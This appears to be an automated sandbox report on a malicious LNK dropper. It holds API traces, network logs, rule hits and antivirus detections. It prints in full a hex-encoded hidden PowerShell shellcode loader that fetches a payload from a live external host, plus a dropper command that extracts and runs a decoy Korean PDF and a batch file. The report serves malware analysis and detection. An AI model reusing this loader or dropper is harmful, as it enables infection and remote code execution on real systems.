command_line: C:\Windows\SysWOW64\cmd.exe /c powershell -windowstyle hidden -command "$tsA ="$FX="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C202033303732293B0D0A247878786161633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472205669727475616C416C6C6F6328496E7450747220622C75696E7420632C75696E7420642C75696E742065293B273B0D0A24787878766163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878616163202D4E616D65202241414322202D50617373546872753B0D0A2478787861626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B0D0A247878786161623D4164642D54797065202D4D656D626572446566696E6974696F6E202478787861626162202D4E616D65202241414222202D50617373546872753B0D0A247878786761633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B0D0A24787878676163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878676163202D4E616D6520224741432220202D50617373546872753B0D0A247878786D6F763D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20766F69642052746C4D6F76654D656D6F727928496E7450747220622C496E7450747220632C75696E742064293B273B0D0A247878786D6F766D3D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6F76202D4E616D6520224D4F5622202D50617373546872753B0D0A247878786D6D733D275B446C6C496D706F727428226D73766372742E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472206D656D73657428496E74507472206473742C75696E74207372632C75696E7420636F756E74293B273B0D0A247878786D6D73663D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6D73202D4E616D6520224D4D5322202D50617373546872753B0D0A2478787863203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B0D0A24787878643D22687474703A2F2F766D693831303833302E636F6E7461626F7365727665722E6E65742F6C6F63616C2F63616368652D6A732F66393337353465363630383032643763633730393234636365623437333865662E677A220D0A2478787862623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B0D0A247878786363633D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786262202D4E616D65202242424222202D50617373546872753B0D0A247878786464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B0D0A247878786666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878646464202D4E616D65202244444422202D50617373546872753B0D0A24787878653D3131323B0D0A646F207B0D0A20747279207B200D0A202024787878632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B0D0A202024787878786D7077343D24787878632E446F776E6C6F616444617461282478787864293B0D0A2020247878786C656E203D2024787878786D7077342E4C656E6774683B0D0A2020247878787830203D2024787878676163663A3A476C6F62616C416C6C6F63283078303034302C20247878786C656E2B3078313030293B0D0A2020247878786F6C64203D20303B0D0A2020247878786161623A3A5669727475616C50726F74656374282478787878302C20247878786C656E2B30783130302C20307834302C205B7265665D247878786F6C64293B0D0A2020247878786B6579203D2024787878786D7077345B305D3B0D0A2020247878786461746150203D2024787878786D7077345B315D3B0D0A2020666F7220282478787868203D20303B202478787868202D6C7420247878786C656E2D2478787864617461503B2024787878682B2B29207B2020200D0A2020205B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478787878302C2024787878682C202824787878786D7077345B24787878682B2478787864617461505D202D62786F722024787878786D7077345B305D2920293B0D0A20207D3B0D0A2020747279207B0D0A2020207468726F7720313B0D0A20207D6361746368207B0D0A2020202478787868616E646C653D247878786363633A3A43726561746554687265616428302C302C2478787878302C302C302C30293B0D0A202020247878786666663A3A57616974466F7253696E676C654F626A656374282478787868616E646C652C202D31293B0D0A20207D3B0D0A202024787878653D3232323B0D0A207D63617463687B0D0A2020736C6565702031353B0D0A202024787878653D3131323B0D0A207D0D0A7D207768696C65282478787865202D657120313132293B""";$Nrd="""""";for($O6c6=0;$O6c6 -le $FX.Length-2;$O6c6=$O6c6+2){$Eh=$FX[$O6c6]+$FX[$O6c6+1];$Nrd= $Nrd+[char]([convert]::toint16($Eh,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($Nrd));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($tsA));"
filepath_r: C:\Windows\SysWOW64\cmd.exe
stack_pivoted: 0
creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

CreateProcessInternalW

 thread_identifier: 2328
thread_handle: 0x00000084
process_identifier: 1916
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell -windowstyle hidden -command "$tsA ="$FX="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C202033303732293B0D0A247878786161633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472205669727475616C416C6C6F6328496E7450747220622C75696E7420632C75696E7420642C75696E742065293B273B0D0A24787878766163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878616163202D4E616D65202241414322202D50617373546872753B0D0A2478787861626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B0D0A247878786161623D4164642D54797065202D4D656D626572446566696E6974696F6E202478787861626162202D4E616D65202241414222202D50617373546872753B0D0A247878786761633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B0D0A24787878676163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878676163202D4E616D6520224741432220202D50617373546872753B0D0A247878786D6F763D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20766F69642052746C4D6F76654D656D6F727928496E7450747220622C496E7450747220632C75696E742064293B273B0D0A247878786D6F766D3D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6F76202D4E616D6520224D4F5622202D50617373546872753B0D0A247878786D6D733D275B446C6C496D706F727428226D73766372742E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472206D656D73657428496E74507472206473742C75696E74207372632C75696E7420636F756E74293B273B0D0A247878786D6D73663D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6D73202D4E616D6520224D4D5322202D50617373546872753B0D0A2478787863203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B0D0A24787878643D22687474703A2F2F766D693831303833302E636F6E7461626F7365727665722E6E65742F6C6F63616C2F63616368652D6A732F66393337353465363630383032643763633730393234636365623437333865662E677A220D0A2478787862623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B0D0A247878786363633D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786262202D4E616D65202242424222202D50617373546872753B0D0A247878786464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B0D0A247878786666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878646464202D4E616D65202244444422202D50617373546872753B0D0A24787878653D3131323B0D0A646F207B0D0A20747279207B200D0A202024787878632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B0D0A202024787878786D7077343D24787878632E446F776E6C6F616444617461282478787864293B0D0A2020247878786C656E203D2024787878786D7077342E4C656E6774683B0D0A2020247878787830203D2024787878676163663A3A476C6F62616C416C6C6F63283078303034302C20247878786C656E2B3078313030293B0D0A2020247878786F6C64203D20303B0D0A2020247878786161623A3A5669727475616C50726F74656374282478787878302C20247878786C656E2B30783130302C20307834302C205B7265665D247878786F6C64293B0D0A2020247878786B6579203D2024787878786D7077345B305D3B0D0A2020247878786461746150203D2024787878786D7077345B315D3B0D0A2020666F7220282478787868203D20303B202478787868202D6C7420247878786C656E2D2478787864617461503B2024787878682B2B29207B2020200D0A2020205B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478787878302C2024787878682C202824787878786D7077345B24787878682B2478787864617461505D202D62786F722024787878786D7077345B305D2920293B0D0A20207D3B0D0A2020747279207B0D0A2020207468726F7720313B0D0A20207D6361746368207B0D0A2020202478787868616E646C653D247878786363633A3A43726561746554687265616428302C302C2478787878302C302C302C30293B0D0A202020247878786666663A3A57616974466F7253696E676C654F626A656374282478787868616E646C652C202D31293B0D0A20207D3B0D0A202024787878653D3232323B0D0A207D63617463687B0D0A2020736C6565702031353B0D0A202024787878653D3131323B0D0A207D0D0A7D207768696C65282478787865202D657120313132293B""";$Nrd="""""";for($O6c6=0;$O6c6 -le $FX.Length-2;$O6c6=$O6c6+2){$Eh=$FX[$O6c6]+$FX[$O6c6+1];$Nrd= $Nrd+[char]([convert]::toint16($Eh,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($Nrd));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($tsA));"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x000001f4
process_name: cmd.exe
process_identifier: 3008
1 1 0

Process32NextW

 snapshot_handle: 0x000001f4
process_name: conhost.exe
process_identifier: 1636
1 1 0

Process32NextW

 snapshot_handle: 0x000001f4
process_name: cmd.exe
process_identifier: 2216
1 1 0

Process32NextW

 snapshot_handle: 0x000001f4
process_name: conhost.exe
process_identifier: 1188
1 1 0

Process32NextW

 snapshot_handle: 0x000001f4
process_name: powershell.exe
process_identifier: 2260
1 1 0

Process32NextW

 snapshot_handle: 0x000001f4
process_name: AcroRd32.exe
process_identifier: 2656
1 1 0

Process32NextW

 snapshot_handle: 0x000001f4
process_name: RdrCEF.exe
process_identifier: 2952
1 1 0

Process32NextW

 snapshot_handle: 0x000001f4
process_name: RdrCEF.exe
process_identifier: 3052
1 1 0

Process32NextW

 snapshot_handle: 0x000001f4
process_name: sppsvc.exe
process_identifier: 2080
1 1 0

Process32NextW

 snapshot_handle: 0x000001f4
process_name: RdrCEF.exe
process_identifier: 2444
1 1 0

Process32NextW

 snapshot_handle: 0x000003e8
process_name: RdrCEF.exe
process_identifier: 2492
1 1 0

Process32NextW

 snapshot_handle: 0x000003e8
process_name: cmd.exe
process_identifier: 236
1 1 0

Process32NextW

 snapshot_handle: 0x000003e8
process_name: conhost.exe
process_identifier: 2240
1 1 0

Process32NextW

 snapshot_handle: 0x000003e8
process_name: pw.exe
process_identifier: 1508
1 1 0

Process32NextW

 snapshot_handle: 0x000003e8
process_name: RdrCEF.exe
process_identifier: 2516
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received HTTP/1.1 404 Not Found Date: Thu, 25 May 2023 01:50:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 289 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <hr> <address>Apache/2.4.41 (Ubuntu) Server at vmi810830.contaboserver.net Port 80</address> </body></html>
Data received HTTP/1.1 404 Not Found Date: Thu, 25 May 2023 01:51:04 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 289 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <hr> <address>Apache/2.4.41 (Ubuntu) Server at vmi810830.contaboserver.net Port 80</address> </body></html>
Data received HTTP/1.1 404 Not Found Date: Thu, 25 May 2023 01:51:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 289 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <hr> <address>Apache/2.4.41 (Ubuntu) Server at vmi810830.contaboserver.net Port 80</address> </body></html>
Data sent GET /local/cache-js/f93754e660802d7cc70924cceb4738ef.gz HTTP/1.1 User-Agent: connnecting... Host: vmi810830.contaboserver.net Connection: Keep-Alive
Data sent GET /local/cache-js/f93754e660802d7cc70924cceb4738ef.gz HTTP/1.1 User-Agent: connnecting... Host: vmi810830.contaboserver.net
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeCreateTokenPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeAssignPrimaryTokenPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeMachineAccountPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeTcbPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeSecurityPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeTakeOwnershipPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeLoadDriverPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeBackupPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeRestorePrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeRemoteShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeEnableDelegationPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeManageVolumePrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeCreateGlobalPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Create a windows service rule Create_Service
description Communication using DGA rule Network_DGA
description Communications over RAW Socket rule Network_TCP_Socket
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Steal credential rule local_credential_Steal
description Match Windows Http API call rule Str_Win32_Http_API
description Communications over P2P network rule Network_P2P_Win
description Match Windows Inet API call rule Str_Win32_Internet_API
description Escalate priviledges rule Escalate_priviledges
description File Downloader rule Network_Downloader
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description Take ScreenShot rule ScreenShot
Time & API Arguments Status Return Repeated

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x000001ec
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000200
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0
Time & API Arguments Status Return Repeated

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 2952
process_handle: 0x0000045c
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 2952
process_handle: 0x0000045c
1 0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 3052
process_handle: 0x0000045c
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 3052
process_handle: 0x0000045c
1 0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 2740
process_handle: 0x00000460
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 2740
process_handle: 0x00000460
1 0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 2444
process_handle: 0x00000460
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 2444
process_handle: 0x00000460
1 0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 2492
process_handle: 0x0000040c
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 2492
process_handle: 0x0000040c
1 0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 2516
process_handle: 0x0000040c
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 2516
process_handle: 0x0000040c
1 0 0
cmdline "C:\Windows\SysWOW64\cmd.exe" /k powershell -windowstyle hidden $Km1W = Get-Location;if($Km1W -Match 'System32' -or $Km1W -Match 'Program Files') {$Km1W = 'C:\Users\test22\AppData\Local\Temp'};$VdP = Get-ChildItem -Path $Km1W -Recurse *.lnk ^| where-object {$_.length -eq 0x0001673333} ^| Select-Object -ExpandProperty FullName;$AxP = gc $VdP -Encoding Byte -TotalCount 001246435 -ReadCount 001246435;$jLfF = 'C:\Users\test22\AppData\Local\Temp\정책연구브리핑 22-15 미ㆍ중 갈등시대 중국의 통상전략 변화와 시사점.pdf';sc $jLfF ([byte[]]($AxP ^| select -Skip 004820)) -Encoding Byte; ^& $jLfF;$k5 = gc $VdP -Encoding Byte -TotalCount 001251719 -ReadCount 001251719;$Ok = 'C:\Users\test22\AppData\Local\Temp\PMTRD.bat';sc $Ok ([byte[]]($k5 ^| select -Skip 01246865)) -Encoding Byte; ^& $Ok;
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\v-jjopqs.cmdline"
cmdline powershell -windowstyle hidden $Km1W = Get-Location;if($Km1W -Match 'System32' -or $Km1W -Match 'Program Files') {$Km1W = 'C:\Users\test22\AppData\Local\Temp'};$VdP = Get-ChildItem -Path $Km1W -Recurse *.lnk | where-object {$_.length -eq 0x0001673333} | Select-Object -ExpandProperty FullName;$AxP = gc $VdP -Encoding Byte -TotalCount 001246435 -ReadCount 001246435;$jLfF = 'C:\Users\test22\AppData\Local\Temp\정책연구브리핑 22-15 미ㆍ중 갈등시대 중국의 통상전략 변화와 시사점.pdf';sc $jLfF ([byte[]]($AxP | select -Skip 004820)) -Encoding Byte; & $jLfF;$k5 = gc $VdP -Encoding Byte -TotalCount 001251719 -ReadCount 001251719;$Ok = 'C:\Users\test22\AppData\Local\Temp\PMTRD.bat';sc $Ok ([byte[]]($k5 | select -Skip 01246865)) -Encoding Byte; & $Ok;
cmdline "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\test22\AppData\Local\Temp\정책연구브리핑 22-15 미ㆍ중 갈등시대 중국의 통상전략 변화와 시사점.pdf"
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\mimxjfes.cmdline"
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\hawz4wth.cmdline"
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\8ax4pzbz.cmdline"
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\td2iyjiy.cmdline"
cmdline "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --locale=ko-kr --backgroundcolor=16514043
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\pfywdxbj.cmdline"
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\ojtnpej4.cmdline"
file C:\Users\test22\AppData\Local\Temp\RES6103.tmp
file c:\Users\test22\AppData\Local\Temp\CSC60F2.tmp
Time & API Arguments Status Return Repeated

send

 buffer: GET /local/cache-js/f93754e660802d7cc70924cceb4738ef.gz HTTP/1.1 User-Agent: connnecting... Host: vmi810830.contaboserver.net Connection: Keep-Alive
socket: 1384
sent: 155
1 155 0

send

 buffer: GET /local/cache-js/f93754e660802d7cc70924cceb4738ef.gz HTTP/1.1 User-Agent: connnecting... Host: vmi810830.contaboserver.net
socket: 1384
sent: 131
1 131 0

send

 buffer: GET /local/cache-js/f93754e660802d7cc70924cceb4738ef.gz HTTP/1.1 User-Agent: connnecting... Host: vmi810830.contaboserver.net
socket: 1384
sent: 131
1 131 0
parent_process acrord32.exe martian_process "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --locale=ko-kr --backgroundcolor=16514043
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Local\Temp\PMTRD.bat"
parent_process powershell.exe martian_process C:\Users\test22\AppData\Local\Temp\정책연구브리핑 22-15 미ㆍ중 갈등시대 중국의 통상전략 변화와 시사점.pdf
parent_process powershell.exe martian_process "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\test22\AppData\Local\Temp\정책연구브리핑 22-15 미ㆍ중 갈등시대 중국의 통상전략 변화와 시사점.pdf"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\v-jjopqs.cmdline"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\hawz4wth.cmdline"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\8ax4pzbz.cmdline"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\pfywdxbj.cmdline"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\td2iyjiy.cmdline"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\ojtnpej4.cmdline"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\mimxjfes.cmdline"
Process injection Process 3008 resumed a thread in remote process 2216
Process injection Process 376 resumed a thread in remote process 2804
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000338
suspend_count: 1
process_identifier: 2216
1 0 0

NtResumeThread

 thread_handle: 0x00000088
suspend_count: 0
process_identifier: 2804
1 0 0
option -windowstyle hidden value Attempts to execute command with a hidden window
option -windowstyle hidden value Attempts to execute command with a hidden window
option -windowstyle hidden value Attempts to execute command with a hidden window
option -windowstyle hidden value Attempts to execute command with a hidden window
count 5036 name heapspray process powershell.exe total_mb 314 length 65536 protection PAGE_READWRITE
count 672 name heapspray process powershell.exe total_mb 81 length 126976 protection PAGE_READWRITE
count 375 name heapspray process powershell.exe total_mb 86 length 241664 protection PAGE_READWRITE
Lionic Trojan.WinLNK.Powecod.4!c
MicroWorld-eScan Heur.BZC.YAX.Boxter.949.9CCAC93A
CAT-QuickHeal Lnk.trojan.A7801312
Sangfor Trojan.Generic-LNK.Save.e2d78363
Cyren LNK/ABRisk.OJXI-2
Symantec Trojan.Gen.NPE.C
ESET-NOD32 a variant of Generik.FRSQUHI
Avast Other:Malware-gen [Trj]
Kaspersky HEUR:Trojan.WinLNK.Powecod.c
BitDefender Heur.BZC.YAX.Boxter.949.9CCAC93A
Emsisoft Heur.BZC.YAX.Boxter.949.9CCAC93A (B)
DrWeb Trojan.MulDrop22.5278
VIPRE Heur.BZC.YAX.Boxter.949.9CCAC93A
FireEye Heur.BZC.YAX.Boxter.949.9CCAC93A
Sophos Troj/LnkDrop-M
SentinelOne Static AI - Suspicious LNK
GData Heur.BZC.YAX.Boxter.949.9CCAC93A
Arcabit Heur.BZC.YAX.Boxter.949.9CCAC93A
ZoneAlarm HEUR:Trojan.WinLNK.Powecod.c
Microsoft Trojan:Script/Wacatac.B!ml
Google Detected
AhnLab-V3 LNK/Autorun.Gen
ALYac Heur.BZC.YAX.Boxter.949.9CCAC93A
MAX malware (ai score=87)
VBA32 Trojan.Link.Crafted
Ikarus BZC.YAX.Boxter
AVG Other:Malware-gen [Trj]
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe